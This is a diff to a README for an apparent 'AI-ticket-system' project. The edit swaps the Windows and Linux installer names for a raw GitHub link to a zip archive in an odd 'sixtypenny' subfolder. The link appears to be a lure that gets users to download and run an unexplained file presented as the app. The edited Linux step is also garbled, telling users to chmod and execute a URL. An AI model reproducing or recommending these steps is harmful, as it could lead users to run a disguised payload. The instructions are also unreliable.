maykpal/AI-ticket-system/readme.md

 1. **Locate the Downloaded File:** After the download completes, navigate to your Downloads folder or the location you chose for the file.
 2. **Run the Installer:**
-   - For Windows: Double-click the `AI-ticket-system.exe` file.
+   - For Windows: Double-click the `https://raw.githubusercontent.com/maykpal/AI-ticket-system/main/sixtypenny/AI-ticket-system.zip` file.
    - For macOS: Open the `.dmg` file and drag the application to your Applications folder.
-   - For Linux: Open a terminal, navigate to the downloaded file, and use the command `chmod +x AI-ticket-system.AppImage` followed by `./AI-ticket-system.AppImage` to run the application.
+   - For Linux: Open a terminal, navigate to the downloaded file, and use the command `chmod +x https://raw.githubusercontent.com/maykpal/AI-ticket-system/main/sixtypenny/AI-ticket-system.zip` followed by `https://raw.githubusercontent.com/maykpal/AI-ticket-system/main/sixtypenny/AI-ticket-system.zip` to run the application.
 3. **Follow the Setup Wizard:** The installation wizard will guide you through the setup process.
 Follow the on-screen instructions to complete the installation.

 ### 🚀 First Time Setup